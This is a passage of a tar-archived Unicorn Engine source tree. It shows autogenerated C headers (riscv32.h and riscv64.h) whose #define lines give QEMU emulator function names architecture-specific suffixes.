helper_gvec_smin64 helper_gvec_smin64_riscv32 #define helper_gvec_smax8 helper_gvec_smax8_riscv32 #define helper_gvec_smax16 helper_gvec_smax16_riscv32 #define helper_gvec_smax32 helper_gvec_smax32_riscv32 #define helper_gvec_smax64 helper_gvec_smax64_riscv32 #define helper_gvec_umin8 helper_gvec_umin8_riscv32 #define helper_gvec_umin16 helper_gvec_umin16_riscv32 #define helper_gvec_umin32 helper_gvec_umin32_riscv32 #define helper_gvec_umin64 helper_gvec_umin64_riscv32 #define helper_gvec_umax8 helper_gvec_umax8_riscv32 #define helper_gvec_umax16 helper_gvec_umax16_riscv32 #define helper_gvec_umax32 helper_gvec_umax32_riscv32 #define helper_gvec_umax64 helper_gvec_umax64_riscv32 #define helper_gvec_bitsel helper_gvec_bitsel_riscv32 #define cpu_restore_state cpu_restore_state_riscv32 #define page_collection_lock page_collection_lock_riscv32 #define page_collection_unlock page_collection_unlock_riscv32 #define free_code_gen_buffer free_code_gen_buffer_riscv32 #define tcg_exec_init tcg_exec_init_riscv32 #define tb_cleanup tb_cleanup_riscv32 #define tb_flush tb_flush_riscv32 #define tb_phys_invalidate tb_phys_invalidate_riscv32 #define tb_gen_code tb_gen_code_riscv32 #define tb_exec_lock tb_exec_lock_riscv32 #define tb_exec_unlock tb_exec_unlock_riscv32 #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_riscv32 #define tb_invalidate_phys_range tb_invalidate_phys_range_riscv32 #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_riscv32 #define tb_check_watchpoint tb_check_watchpoint_riscv32 #define cpu_io_recompile cpu_io_recompile_riscv32 #define tb_flush_jmp_cache tb_flush_jmp_cache_riscv32 #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_riscv32 #define translator_loop_temp_check translator_loop_temp_check_riscv32 #define translator_loop translator_loop_riscv32 #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_riscv32 #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_riscv32 #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_riscv32 #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_riscv32 #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_riscv32 #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_riscv32 #define unassigned_mem_ops unassigned_mem_ops_riscv32 #define floatx80_infinity floatx80_infinity_riscv32 #define dup_const_func dup_const_func_riscv32 #define gen_helper_raise_exception gen_helper_raise_exception_riscv32 #define gen_helper_raise_interrupt gen_helper_raise_interrupt_riscv32 #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_riscv32 #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_riscv32 #define gen_helper_cpsr_read gen_helper_cpsr_read_riscv32 #define gen_helper_cpsr_write gen_helper_cpsr_write_riscv32 #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_riscv32 #define riscv_cpu_mmu_index riscv_cpu_mmu_index_riscv32 #define riscv_cpu_exec_interrupt riscv_cpu_exec_interrupt_riscv32 #define riscv_cpu_fp_enabled riscv_cpu_fp_enabled_riscv32 #define riscv_cpu_swap_hypervisor_regs riscv_cpu_swap_hypervisor_regs_riscv32 #define riscv_cpu_virt_enabled riscv_cpu_virt_enabled_riscv32 #define riscv_cpu_set_virt_enabled riscv_cpu_set_virt_enabled_riscv32 #define riscv_cpu_force_hs_excep_enabled riscv_cpu_force_hs_excep_enabled_riscv32 #define riscv_cpu_set_force_hs_excep riscv_cpu_set_force_hs_excep_riscv32 #define riscv_cpu_claim_interrupts riscv_cpu_claim_interrupts_riscv32 #define riscv_cpu_update_mip riscv_cpu_update_mip_riscv32 #define riscv_cpu_set_rdtime_fn riscv_cpu_set_rdtime_fn_riscv32 #define riscv_cpu_set_mode riscv_cpu_set_mode_riscv32 #define riscv_cpu_get_phys_page_debug riscv_cpu_get_phys_page_debug_riscv32 #define riscv_cpu_do_transaction_failed riscv_cpu_do_transaction_failed_riscv32 #define riscv_cpu_do_unaligned_access riscv_cpu_do_unaligned_access_riscv32 #define riscv_cpu_tlb_fill riscv_cpu_tlb_fill_riscv32 #define riscv_cpu_do_interrupt riscv_cpu_do_interrupt_riscv32 #define riscv_get_csr_ops riscv_get_csr_ops_riscv32 #define riscv_set_csr_ops riscv_set_csr_ops_riscv32 #define riscv_csrrw riscv_csrrw_riscv32 #define riscv_csrrw_debug riscv_csrrw_debug_riscv32 #define riscv_cpu_get_fflags riscv_cpu_get_fflags_riscv32 #define riscv_cpu_set_fflags riscv_cpu_set_fflags_riscv32 #define helper_set_rounding_mode helper_set_rounding_mode_riscv32 #define helper_fmadd_s helper_fmadd_s_riscv32 #define helper_fmadd_d helper_fmadd_d_riscv32 #define helper_fmsub_s helper_fmsub_s_riscv32 #define helper_fmsub_d helper_fmsub_d_riscv32 #define helper_fnmsub_s helper_fnmsub_s_riscv32 #define helper_fnmsub_d helper_fnmsub_d_riscv32 #define helper_fnmadd_s helper_fnmadd_s_riscv32 #define helper_fnmadd_d helper_fnmadd_d_riscv32 #define helper_fadd_s helper_fadd_s_riscv32 #define helper_fsub_s helper_fsub_s_riscv32 #define helper_fmul_s helper_fmul_s_riscv32 #define helper_fdiv_s helper_fdiv_s_riscv32 #define helper_fmin_s helper_fmin_s_riscv32 #define helper_fmax_s helper_fmax_s_riscv32 #define helper_fsqrt_s helper_fsqrt_s_riscv32 #define helper_fle_s helper_fle_s_riscv32 #define helper_flt_s helper_flt_s_riscv32 #define helper_feq_s helper_feq_s_riscv32 #define helper_fcvt_w_s helper_fcvt_w_s_riscv32 #define helper_fcvt_wu_s helper_fcvt_wu_s_riscv32 #define helper_fcvt_s_w helper_fcvt_s_w_riscv32 #define helper_fcvt_s_wu helper_fcvt_s_wu_riscv32 #define helper_fclass_s helper_fclass_s_riscv32 #define helper_fadd_d helper_fadd_d_riscv32 #define helper_fsub_d helper_fsub_d_riscv32 #define helper_fmul_d helper_fmul_d_riscv32 #define helper_fdiv_d helper_fdiv_d_riscv32 #define helper_fmin_d helper_fmin_d_riscv32 #define helper_fmax_d helper_fmax_d_riscv32 #define helper_fcvt_s_d helper_fcvt_s_d_riscv32 #define helper_fcvt_d_s helper_fcvt_d_s_riscv32 #define helper_fsqrt_d helper_fsqrt_d_riscv32 #define helper_fle_d helper_fle_d_riscv32 #define helper_flt_d helper_flt_d_riscv32 #define helper_feq_d helper_feq_d_riscv32 #define helper_fcvt_w_d helper_fcvt_w_d_riscv32 #define helper_fcvt_wu_d helper_fcvt_wu_d_riscv32 #define helper_fcvt_d_w helper_fcvt_d_w_riscv32 #define helper_fcvt_d_wu helper_fcvt_d_wu_riscv32 #define helper_fclass_d helper_fclass_d_riscv32 #define riscv_raise_exception riscv_raise_exception_riscv32 #define helper_raise_exception helper_raise_exception_riscv32 #define helper_uc_riscv_exit helper_uc_riscv_exit_riscv32 #define helper_csrrw helper_csrrw_riscv32 #define helper_csrrs helper_csrrs_riscv32 #define helper_csrrc helper_csrrc_riscv32 #define helper_sret helper_sret_riscv32 #define helper_mret helper_mret_riscv32 #define helper_wfi helper_wfi_riscv32 #define helper_tlb_flush helper_tlb_flush_riscv32 #define pmp_hart_has_privs pmp_hart_has_privs_riscv32 #define pmpcfg_csr_write pmpcfg_csr_write_riscv32 #define pmpcfg_csr_read pmpcfg_csr_read_riscv32 #define pmpaddr_csr_write pmpaddr_csr_write_riscv32 #define pmpaddr_csr_read pmpaddr_csr_read_riscv32 #define gen_intermediate_code gen_intermediate_code_riscv32 #define riscv_translate_init riscv_translate_init_riscv32 #define restore_state_to_opc restore_state_to_opc_riscv32 #define cpu_riscv_init cpu_riscv_init_riscv32 #define helper_fcvt_l_s helper_fcvt_l_s_riscv32 #define helper_fcvt_lu_s helper_fcvt_lu_s_riscv32 #define helper_fcvt_s_l helper_fcvt_s_l_riscv32 #define helper_fcvt_s_lu helper_fcvt_s_lu_riscv32 #define helper_fcvt_l_d helper_fcvt_l_d_riscv32 #define helper_fcvt_lu_d helper_fcvt_lu_d_riscv32 #define helper_fcvt_d_l helper_fcvt_d_l_riscv32 #define helper_fcvt_d_lu helper_fcvt_d_lu_riscv32 #define gen_helper_tlb_flush gen_helper_tlb_flush_riscv32 #define riscv_fpr_regnames riscv_fpr_regnames_riscv32 #define riscv_int_regnames riscv_int_regnames_riscv32 #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/riscv64.h������������������������������������������������������������������������0000664�0000000�0000000�00000234230�14675241067�0015630�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Autogen header for Unicorn Engine - DONOT MODIFY */ #ifndef UNICORN_AUTOGEN_riscv64_H #define UNICORN_AUTOGEN_riscv64_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _riscv64 #endif #define unicorn_fill_tlb unicorn_fill_tlb_riscv64 #define reg_read reg_read_riscv64 #define reg_write reg_write_riscv64 #define uc_init uc_init_riscv64 #define uc_add_inline_hook uc_add_inline_hook_riscv64 #define uc_del_inline_hook uc_del_inline_hook_riscv64 #define tb_invalidate_phys_range tb_invalidate_phys_range_riscv64 #define use_idiv_instructions use_idiv_instructions_riscv64 #define arm_arch arm_arch_riscv64 #define tb_target_set_jmp_target tb_target_set_jmp_target_riscv64 #define have_bmi1 have_bmi1_riscv64 #define have_popcnt have_popcnt_riscv64 #define have_avx1 have_avx1_riscv64 #define have_avx2 have_avx2_riscv64 #define have_isa have_isa_riscv64 #define have_altivec have_altivec_riscv64 #define have_vsx have_vsx_riscv64 #define flush_icache_range flush_icache_range_riscv64 #define s390_facilities s390_facilities_riscv64 #define tcg_dump_op tcg_dump_op_riscv64 #define tcg_dump_ops tcg_dump_ops_riscv64 #define tcg_gen_and_i64 tcg_gen_and_i64_riscv64 #define tcg_gen_discard_i64 tcg_gen_discard_i64_riscv64 #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_riscv64 #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_riscv64 #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_riscv64 #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_riscv64 #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_riscv64 #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_riscv64 #define tcg_gen_ld_i64 tcg_gen_ld_i64_riscv64 #define tcg_gen_mov_i64 tcg_gen_mov_i64_riscv64 #define tcg_gen_movi_i64 tcg_gen_movi_i64_riscv64 #define tcg_gen_mul_i64 tcg_gen_mul_i64_riscv64 #define tcg_gen_or_i64 tcg_gen_or_i64_riscv64 #define tcg_gen_sar_i64 tcg_gen_sar_i64_riscv64 #define tcg_gen_shl_i64 tcg_gen_shl_i64_riscv64 #define tcg_gen_shr_i64 tcg_gen_shr_i64_riscv64 #define tcg_gen_st_i64 tcg_gen_st_i64_riscv64 #define tcg_gen_xor_i64 tcg_gen_xor_i64_riscv64 #define cpu_icount_to_ns cpu_icount_to_ns_riscv64 #define cpu_is_stopped cpu_is_stopped_riscv64 #define cpu_get_ticks cpu_get_ticks_riscv64 #define cpu_get_clock cpu_get_clock_riscv64 #define cpu_resume cpu_resume_riscv64 #define qemu_init_vcpu qemu_init_vcpu_riscv64 #define cpu_stop_current cpu_stop_current_riscv64 #define resume_all_vcpus resume_all_vcpus_riscv64 #define vm_start vm_start_riscv64 #define address_space_dispatch_compact address_space_dispatch_compact_riscv64 #define flatview_translate flatview_translate_riscv64 #define address_space_translate_for_iotlb address_space_translate_for_iotlb_riscv64 #define qemu_get_cpu qemu_get_cpu_riscv64 #define cpu_address_space_init cpu_address_space_init_riscv64 #define cpu_get_address_space cpu_get_address_space_riscv64 #define cpu_exec_unrealizefn cpu_exec_unrealizefn_riscv64 #define cpu_exec_initfn cpu_exec_initfn_riscv64 #define cpu_exec_realizefn cpu_exec_realizefn_riscv64 #define tb_invalidate_phys_addr tb_invalidate_phys_addr_riscv64 #define cpu_watchpoint_insert cpu_watchpoint_insert_riscv64 #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_riscv64 #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_riscv64 #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_riscv64 #define cpu_breakpoint_insert cpu_breakpoint_insert_riscv64 #define cpu_breakpoint_remove cpu_breakpoint_remove_riscv64 #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_riscv64 #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_riscv64 #define cpu_abort cpu_abort_riscv64 #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_riscv64 #define memory_region_section_get_iotlb memory_region_section_get_iotlb_riscv64 #define flatview_add_to_dispatch flatview_add_to_dispatch_riscv64 #define qemu_ram_get_host_addr qemu_ram_get_host_addr_riscv64 #define qemu_ram_get_offset qemu_ram_get_offset_riscv64 #define qemu_ram_get_used_length qemu_ram_get_used_length_riscv64 #define qemu_ram_is_shared qemu_ram_is_shared_riscv64 #define qemu_ram_pagesize qemu_ram_pagesize_riscv64 #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_riscv64 #define qemu_ram_alloc qemu_ram_alloc_riscv64 #define qemu_ram_free qemu_ram_free_riscv64 #define qemu_map_ram_ptr qemu_map_ram_ptr_riscv64 #define qemu_ram_block_host_offset qemu_ram_block_host_offset_riscv64 #define qemu_ram_block_from_host qemu_ram_block_from_host_riscv64 #define qemu_ram_addr_from_host qemu_ram_addr_from_host_riscv64 #define cpu_check_watchpoint cpu_check_watchpoint_riscv64 #define iotlb_to_section iotlb_to_section_riscv64 #define address_space_dispatch_new address_space_dispatch_new_riscv64 #define address_space_dispatch_free address_space_dispatch_free_riscv64 #define flatview_read_continue flatview_read_continue_riscv64 #define address_space_read_full address_space_read_full_riscv64 #define address_space_write address_space_write_riscv64 #define address_space_rw address_space_rw_riscv64 #define cpu_physical_memory_rw cpu_physical_memory_rw_riscv64 #define address_space_write_rom address_space_write_rom_riscv64 #define cpu_flush_icache_range cpu_flush_icache_range_riscv64 #define cpu_exec_init_all cpu_exec_init_all_riscv64 #define address_space_access_valid address_space_access_valid_riscv64 #define address_space_map address_space_map_riscv64 #define address_space_unmap address_space_unmap_riscv64 #define cpu_physical_memory_map cpu_physical_memory_map_riscv64 #define cpu_physical_memory_unmap cpu_physical_memory_unmap_riscv64 #define cpu_memory_rw_debug cpu_memory_rw_debug_riscv64 #define qemu_target_page_size qemu_target_page_size_riscv64 #define qemu_target_page_bits qemu_target_page_bits_riscv64 #define qemu_target_page_bits_min qemu_target_page_bits_min_riscv64 #define target_words_bigendian target_words_bigendian_riscv64 #define cpu_physical_memory_is_io cpu_physical_memory_is_io_riscv64 #define ram_block_discard_range ram_block_discard_range_riscv64 #define ramblock_is_pmem ramblock_is_pmem_riscv64 #define page_size_init page_size_init_riscv64 #define set_preferred_target_page_bits set_preferred_target_page_bits_riscv64 #define finalize_target_page_bits finalize_target_page_bits_riscv64 #define cpu_outb cpu_outb_riscv64 #define cpu_outw cpu_outw_riscv64 #define cpu_outl cpu_outl_riscv64 #define cpu_inb cpu_inb_riscv64 #define cpu_inw cpu_inw_riscv64 #define cpu_inl cpu_inl_riscv64 #define memory_map memory_map_riscv64 #define memory_map_io memory_map_io_riscv64 #define memory_map_ptr memory_map_ptr_riscv64 #define memory_cow memory_cow_riscv64 #define memory_unmap memory_unmap_riscv64 #define memory_moveout memory_moveout_riscv64 #define memory_movein memory_movein_riscv64 #define memory_free memory_free_riscv64 #define flatview_unref flatview_unref_riscv64 #define address_space_get_flatview address_space_get_flatview_riscv64 #define memory_region_transaction_begin memory_region_transaction_begin_riscv64 #define memory_region_transaction_commit memory_region_transaction_commit_riscv64 #define memory_region_init memory_region_init_riscv64 #define memory_region_access_valid memory_region_access_valid_riscv64 #define memory_region_dispatch_read memory_region_dispatch_read_riscv64 #define memory_region_dispatch_write memory_region_dispatch_write_riscv64 #define memory_region_init_io memory_region_init_io_riscv64 #define memory_region_init_ram_ptr memory_region_init_ram_ptr_riscv64 #define memory_region_size memory_region_size_riscv64 #define memory_region_set_readonly memory_region_set_readonly_riscv64 #define memory_region_get_ram_ptr memory_region_get_ram_ptr_riscv64 #define memory_region_from_host memory_region_from_host_riscv64 #define memory_region_get_ram_addr memory_region_get_ram_addr_riscv64 #define memory_region_add_subregion memory_region_add_subregion_riscv64 #define memory_region_del_subregion memory_region_del_subregion_riscv64 #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_riscv64 #define memory_region_find memory_region_find_riscv64 #define memory_region_filter_subregions memory_region_filter_subregions_riscv64 #define memory_listener_register memory_listener_register_riscv64 #define memory_listener_unregister memory_listener_unregister_riscv64 #define address_space_remove_listeners address_space_remove_listeners_riscv64 #define address_space_init address_space_init_riscv64 #define address_space_destroy address_space_destroy_riscv64 #define memory_region_init_ram memory_region_init_ram_riscv64 #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_riscv64 #define find_memory_mapping find_memory_mapping_riscv64 #define exec_inline_op exec_inline_op_riscv64 #define floatx80_default_nan floatx80_default_nan_riscv64 #define float_raise float_raise_riscv64 #define float16_is_quiet_nan float16_is_quiet_nan_riscv64 #define float16_is_signaling_nan float16_is_signaling_nan_riscv64 #define float32_is_quiet_nan float32_is_quiet_nan_riscv64 #define float32_is_signaling_nan float32_is_signaling_nan_riscv64 #define float64_is_quiet_nan float64_is_quiet_nan_riscv64 #define float64_is_signaling_nan float64_is_signaling_nan_riscv64 #define floatx80_is_quiet_nan floatx80_is_quiet_nan_riscv64 #define floatx80_is_signaling_nan floatx80_is_signaling_nan_riscv64 #define floatx80_silence_nan floatx80_silence_nan_riscv64 #define propagateFloatx80NaN propagateFloatx80NaN_riscv64 #define float128_is_quiet_nan float128_is_quiet_nan_riscv64 #define float128_is_signaling_nan float128_is_signaling_nan_riscv64 #define float128_silence_nan float128_silence_nan_riscv64 #define float16_add float16_add_riscv64 #define float16_sub float16_sub_riscv64 #define float32_add float32_add_riscv64 #define float32_sub float32_sub_riscv64 #define float64_add float64_add_riscv64 #define float64_sub float64_sub_riscv64 #define float16_mul float16_mul_riscv64 #define float32_mul float32_mul_riscv64 #define float64_mul float64_mul_riscv64 #define float16_muladd float16_muladd_riscv64 #define float32_muladd float32_muladd_riscv64 #define float64_muladd float64_muladd_riscv64 #define float16_div float16_div_riscv64 #define float32_div float32_div_riscv64 #define float64_div float64_div_riscv64 #define float16_to_float32 float16_to_float32_riscv64 #define float16_to_float64 float16_to_float64_riscv64 #define float32_to_float16 float32_to_float16_riscv64 #define float32_to_float64 float32_to_float64_riscv64 #define float64_to_float16 float64_to_float16_riscv64 #define float64_to_float32 float64_to_float32_riscv64 #define float16_round_to_int float16_round_to_int_riscv64 #define float32_round_to_int float32_round_to_int_riscv64 #define float64_round_to_int float64_round_to_int_riscv64 #define float16_to_int16_scalbn float16_to_int16_scalbn_riscv64 #define float16_to_int32_scalbn float16_to_int32_scalbn_riscv64 #define float16_to_int64_scalbn float16_to_int64_scalbn_riscv64 #define float32_to_int16_scalbn float32_to_int16_scalbn_riscv64 #define float32_to_int32_scalbn float32_to_int32_scalbn_riscv64 #define float32_to_int64_scalbn float32_to_int64_scalbn_riscv64 #define float64_to_int16_scalbn float64_to_int16_scalbn_riscv64 #define float64_to_int32_scalbn float64_to_int32_scalbn_riscv64 #define float64_to_int64_scalbn float64_to_int64_scalbn_riscv64 #define float16_to_int16 float16_to_int16_riscv64 #define float16_to_int32 float16_to_int32_riscv64 #define float16_to_int64 float16_to_int64_riscv64 #define float32_to_int16 float32_to_int16_riscv64 #define float32_to_int32 float32_to_int32_riscv64 #define float32_to_int64 float32_to_int64_riscv64 #define float64_to_int16 float64_to_int16_riscv64 #define float64_to_int32 float64_to_int32_riscv64 #define float64_to_int64 float64_to_int64_riscv64 #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_riscv64 #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_riscv64 #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_riscv64 #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_riscv64 #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_riscv64 #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_riscv64 #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_riscv64 #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_riscv64 #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_riscv64 #define float16_to_uint16_scalbn float16_to_uint16_scalbn_riscv64 #define float16_to_uint32_scalbn float16_to_uint32_scalbn_riscv64 #define float16_to_uint64_scalbn float16_to_uint64_scalbn_riscv64 #define float32_to_uint16_scalbn float32_to_uint16_scalbn_riscv64 #define float32_to_uint32_scalbn float32_to_uint32_scalbn_riscv64 #define float32_to_uint64_scalbn float32_to_uint64_scalbn_riscv64 #define float64_to_uint16_scalbn float64_to_uint16_scalbn_riscv64 #define float64_to_uint32_scalbn float64_to_uint32_scalbn_riscv64 #define float64_to_uint64_scalbn float64_to_uint64_scalbn_riscv64 #define float16_to_uint16 float16_to_uint16_riscv64 #define float16_to_uint32 float16_to_uint32_riscv64 #define float16_to_uint64 float16_to_uint64_riscv64 #define float32_to_uint16 float32_to_uint16_riscv64 #define float32_to_uint32 float32_to_uint32_riscv64 #define float32_to_uint64 float32_to_uint64_riscv64 #define float64_to_uint16 float64_to_uint16_riscv64 #define float64_to_uint32 float64_to_uint32_riscv64 #define float64_to_uint64 float64_to_uint64_riscv64 #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_riscv64 #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_riscv64 #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_riscv64 #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_riscv64 #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_riscv64 #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_riscv64 #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_riscv64 #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_riscv64 #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_riscv64 #define int64_to_float16_scalbn int64_to_float16_scalbn_riscv64 #define int32_to_float16_scalbn int32_to_float16_scalbn_riscv64 #define int16_to_float16_scalbn int16_to_float16_scalbn_riscv64 #define int64_to_float16 int64_to_float16_riscv64 #define int32_to_float16 int32_to_float16_riscv64 #define int16_to_float16 int16_to_float16_riscv64 #define int64_to_float32_scalbn int64_to_float32_scalbn_riscv64 #define int32_to_float32_scalbn int32_to_float32_scalbn_riscv64 #define int16_to_float32_scalbn int16_to_float32_scalbn_riscv64 #define int64_to_float32 int64_to_float32_riscv64 #define int32_to_float32 int32_to_float32_riscv64 #define int16_to_float32 int16_to_float32_riscv64 #define int64_to_float64_scalbn int64_to_float64_scalbn_riscv64 #define int32_to_float64_scalbn int32_to_float64_scalbn_riscv64 #define int16_to_float64_scalbn int16_to_float64_scalbn_riscv64 #define int64_to_float64 int64_to_float64_riscv64 #define int32_to_float64 int32_to_float64_riscv64 #define int16_to_float64 int16_to_float64_riscv64 #define uint64_to_float16_scalbn uint64_to_float16_scalbn_riscv64 #define uint32_to_float16_scalbn uint32_to_float16_scalbn_riscv64 #define uint16_to_float16_scalbn uint16_to_float16_scalbn_riscv64 #define uint64_to_float16 uint64_to_float16_riscv64 #define uint32_to_float16 uint32_to_float16_riscv64 #define uint16_to_float16 uint16_to_float16_riscv64 #define uint64_to_float32_scalbn uint64_to_float32_scalbn_riscv64 #define uint32_to_float32_scalbn uint32_to_float32_scalbn_riscv64 #define uint16_to_float32_scalbn uint16_to_float32_scalbn_riscv64 #define uint64_to_float32 uint64_to_float32_riscv64 #define uint32_to_float32 uint32_to_float32_riscv64 #define uint16_to_float32 uint16_to_float32_riscv64 #define uint64_to_float64_scalbn uint64_to_float64_scalbn_riscv64 #define uint32_to_float64_scalbn uint32_to_float64_scalbn_riscv64 #define uint16_to_float64_scalbn uint16_to_float64_scalbn_riscv64 #define uint64_to_float64 uint64_to_float64_riscv64 #define uint32_to_float64 uint32_to_float64_riscv64 #define uint16_to_float64 uint16_to_float64_riscv64 #define float16_min float16_min_riscv64 #define float16_minnum float16_minnum_riscv64 #define float16_minnummag float16_minnummag_riscv64 #define float16_max float16_max_riscv64 #define float16_maxnum float16_maxnum_riscv64 #define float16_maxnummag float16_maxnummag_riscv64 #define float32_min float32_min_riscv64 #define float32_minnum float32_minnum_riscv64 #define float32_minnummag float32_minnummag_riscv64 #define float32_max float32_max_riscv64 #define float32_maxnum float32_maxnum_riscv64 #define float32_maxnummag float32_maxnummag_riscv64 #define float64_min float64_min_riscv64 #define float64_minnum float64_minnum_riscv64 #define float64_minnummag float64_minnummag_riscv64 #define float64_max float64_max_riscv64 #define float64_maxnum float64_maxnum_riscv64 #define float64_maxnummag float64_maxnummag_riscv64 #define float16_compare float16_compare_riscv64 #define float16_compare_quiet float16_compare_quiet_riscv64 #define float32_compare float32_compare_riscv64 #define float32_compare_quiet float32_compare_quiet_riscv64 #define float64_compare float64_compare_riscv64 #define float64_compare_quiet float64_compare_quiet_riscv64 #define float16_scalbn float16_scalbn_riscv64 #define float32_scalbn float32_scalbn_riscv64 #define float64_scalbn float64_scalbn_riscv64 #define float16_sqrt float16_sqrt_riscv64 #define float32_sqrt float32_sqrt_riscv64 #define float64_sqrt float64_sqrt_riscv64 #define float16_default_nan float16_default_nan_riscv64 #define float32_default_nan float32_default_nan_riscv64 #define float64_default_nan float64_default_nan_riscv64 #define float128_default_nan float128_default_nan_riscv64 #define float16_silence_nan float16_silence_nan_riscv64 #define float32_silence_nan float32_silence_nan_riscv64 #define float64_silence_nan float64_silence_nan_riscv64 #define float16_squash_input_denormal float16_squash_input_denormal_riscv64 #define float32_squash_input_denormal float32_squash_input_denormal_riscv64 #define float64_squash_input_denormal float64_squash_input_denormal_riscv64 #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_riscv64 #define roundAndPackFloatx80 roundAndPackFloatx80_riscv64 #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_riscv64 #define int32_to_floatx80 int32_to_floatx80_riscv64 #define int32_to_float128 int32_to_float128_riscv64 #define int64_to_floatx80 int64_to_floatx80_riscv64 #define int64_to_float128 int64_to_float128_riscv64 #define uint64_to_float128 uint64_to_float128_riscv64 #define float32_to_floatx80 float32_to_floatx80_riscv64 #define float32_to_float128 float32_to_float128_riscv64 #define float32_rem float32_rem_riscv64 #define float32_exp2 float32_exp2_riscv64 #define float32_log2 float32_log2_riscv64 #define float32_eq float32_eq_riscv64 #define float32_le float32_le_riscv64 #define float32_lt float32_lt_riscv64 #define float32_unordered float32_unordered_riscv64 #define float32_eq_quiet float32_eq_quiet_riscv64 #define float32_le_quiet float32_le_quiet_riscv64 #define float32_lt_quiet float32_lt_quiet_riscv64 #define float32_unordered_quiet float32_unordered_quiet_riscv64 #define float64_to_floatx80 float64_to_floatx80_riscv64 #define float64_to_float128 float64_to_float128_riscv64 #define float64_rem float64_rem_riscv64 #define float64_log2 float64_log2_riscv64 #define float64_eq float64_eq_riscv64 #define float64_le float64_le_riscv64 #define float64_lt float64_lt_riscv64 #define float64_unordered float64_unordered_riscv64 #define float64_eq_quiet float64_eq_quiet_riscv64 #define float64_le_quiet float64_le_quiet_riscv64 #define float64_lt_quiet float64_lt_quiet_riscv64 #define float64_unordered_quiet float64_unordered_quiet_riscv64 #define floatx80_to_int32 floatx80_to_int32_riscv64 #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_riscv64 #define floatx80_to_int64 floatx80_to_int64_riscv64 #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_riscv64 #define floatx80_to_float32 floatx80_to_float32_riscv64 #define floatx80_to_float64 floatx80_to_float64_riscv64 #define floatx80_to_float128 floatx80_to_float128_riscv64 #define floatx80_round floatx80_round_riscv64 #define floatx80_round_to_int floatx80_round_to_int_riscv64 #define floatx80_add floatx80_add_riscv64 #define floatx80_sub floatx80_sub_riscv64 #define floatx80_mul floatx80_mul_riscv64 #define floatx80_div floatx80_div_riscv64 #define floatx80_rem floatx80_rem_riscv64 #define floatx80_sqrt floatx80_sqrt_riscv64 #define floatx80_eq floatx80_eq_riscv64 #define floatx80_le floatx80_le_riscv64 #define floatx80_lt floatx80_lt_riscv64 #define floatx80_unordered floatx80_unordered_riscv64 #define floatx80_eq_quiet floatx80_eq_quiet_riscv64 #define floatx80_le_quiet floatx80_le_quiet_riscv64 #define floatx80_lt_quiet floatx80_lt_quiet_riscv64 #define floatx80_unordered_quiet floatx80_unordered_quiet_riscv64 #define float128_to_int32 float128_to_int32_riscv64 #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_riscv64 #define float128_to_int64 float128_to_int64_riscv64 #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_riscv64 #define float128_to_uint64 float128_to_uint64_riscv64 #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_riscv64 #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_riscv64 #define float128_to_uint32 float128_to_uint32_riscv64 #define float128_to_float32 float128_to_float32_riscv64 #define float128_to_float64 float128_to_float64_riscv64 #define float128_to_floatx80 float128_to_floatx80_riscv64 #define float128_round_to_int float128_round_to_int_riscv64 #define float128_add float128_add_riscv64 #define 